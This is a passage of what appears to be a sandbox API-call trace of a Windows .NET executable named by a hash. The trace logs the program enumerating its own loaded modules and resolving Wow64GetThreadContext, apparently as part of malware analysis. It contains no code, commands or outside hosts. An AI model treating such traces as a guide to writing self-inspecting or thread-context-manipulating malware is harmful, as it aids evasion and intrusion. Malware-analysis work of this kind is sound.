EntryPoint=0x75984f00)) returned 1 [0167.337] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0167.337] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0167.337] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x2270a40, cb=0xc | out: lpmodinfo=0x2270a40*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0167.338] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0167.338] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0167.338] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x2272b4c, cb=0xc | out: lpmodinfo=0x2272b4c*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0167.339] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0167.340] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0167.340] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x2274c60, cb=0xc | out: lpmodinfo=0x2274c60*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0167.341] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0167.341] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0167.342] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x2276d94, cb=0xc | out: lpmodinfo=0x2276d94*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0167.342] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0167.343] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0167.343] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x2278edc, cb=0xc | out: lpmodinfo=0x2278edc*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0167.343] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0167.344] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0167.345] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x227afe8, cb=0xc | out: lpmodinfo=0x227afe8*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0167.345] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0167.346] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0167.346] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x227d0f4, cb=0xc | out: lpmodinfo=0x227d0f4*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0167.347] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0167.347] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0167.348] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x227f284, cb=0xc | out: lpmodinfo=0x227f284*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0167.348] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0167.349] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0167.349] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x2281390, cb=0xc | out: lpmodinfo=0x2281390*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0167.350] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0167.350] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0167.351] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x2283494, cb=0xc | out: lpmodinfo=0x2283494*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0167.351] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0167.352] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0167.352] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x22855c0, cb=0xc | out: lpmodinfo=0x22855c0*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0167.353] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0167.355] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0167.356] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x22876cc, cb=0xc | out: lpmodinfo=0x22876cc*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0167.356] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0167.357] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0167.357] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x22897fc, cb=0xc | out: lpmodinfo=0x22897fc*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0167.358] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0167.359] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0167.360] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x228b930, cb=0xc | out: lpmodinfo=0x228b930*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0167.360] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0167.361] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0167.362] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x228dad8, cb=0xc | out: lpmodinfo=0x228dad8*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0167.362] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0167.363] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0167.364] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x228fbdc, cb=0xc | out: lpmodinfo=0x228fbdc*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0167.364] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0167.365] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0167.366] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x2291ce8, cb=0xc | out: lpmodinfo=0x2291ce8*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0167.367] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0167.367] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0167.368] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x2293df4, cb=0xc | out: lpmodinfo=0x2293df4*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0167.374] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0167.375] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0167.375] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x2295f00, cb=0xc | out: lpmodinfo=0x2295f00*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0167.376] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0167.377] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0167.377] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x229800c, cb=0xc | out: lpmodinfo=0x229800c*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0167.378] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0167.378] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0167.379] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x229a14c, cb=0xc | out: lpmodinfo=0x229a14c*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0167.380] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0167.380] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0167.381] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x229c260, cb=0xc | out: lpmodinfo=0x229c260*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0167.382] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0167.382] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0167.383] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x229e3fc, cb=0xc | out: lpmodinfo=0x229e3fc*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0167.383] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0167.384] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0167.385] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x22a06d4, cb=0xc | out: lpmodinfo=0x22a06d4*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0167.385] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0167.386] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0167.387] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x22a28c4, cb=0xc | out: lpmodinfo=0x22a28c4*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0167.387] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0167.388] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0167.389] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x22a4a88, cb=0xc | out: lpmodinfo=0x22a4a88*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0167.389] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0167.390] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0167.391] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x22a6b94, cb=0xc | out: lpmodinfo=0x22a6b94*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0167.392] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0167.392] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0167.393] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x22a8d90, cb=0xc | out: lpmodinfo=0x22a8d90*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0167.394] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0167.394] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0167.395] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x22aae94, cb=0xc | out: lpmodinfo=0x22aae94*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0167.396] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0167.397] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0167.397] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x22ad050, cb=0xc | out: lpmodinfo=0x22ad050*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0167.398] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0167.399] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0167.400] CloseHandle (hObject=0x2e4) returned 1 [0167.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wow64GetThreadContext", cchWideChar=21, lpMultiByteStr=0x19cb6c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wow64GetThreadContextÚd", lpUsedDefaultChar=0x0) returned 21 [0167.400] GetProcAddress (hModule=0x74610000, lpProcName="Wow64GetThreadContext") returned 0x74653e30 [0167.402] GetCurrentProcessId () returned 0x1318 [0167.402] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.402] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x22afb08, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x22afb08, lpcbNeeded=0x19cb68) returned 1 [0167.403] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x22afc48, cb=0xc | out: lpmodinfo=0x22afc48*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0167.403] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0167.403] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0167.403] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x22b1e6c, cb=0xc | out: lpmodinfo=0x22b1e6c*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0167.404] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0167.404] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0167.404] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x22b3f70, cb=0xc | out: lpmodinfo=0x22b3f70*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0167.404] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0167.404] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0167.404] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x22b607c, cb=0xc | out: lpmodinfo=0x22b607c*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0167.405] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0167.405] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0167.405] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x22b8190, cb=0xc | out: lpmodinfo=0x22b8190*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0167.405] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0167.405] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0167.406] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x22ba2d8, cb=0xc | out: lpmodinfo=0x22ba2d8*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0167.406] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0167.406] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0167.406] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x22bc3e4, cb=0xc | out: lpmodinfo=0x22bc3e4*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0167.407] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0167.407] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0167.407] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x22be4f8, cb=0xc | out: lpmodinfo=0x22be4f8*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0167.407] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0167.408] 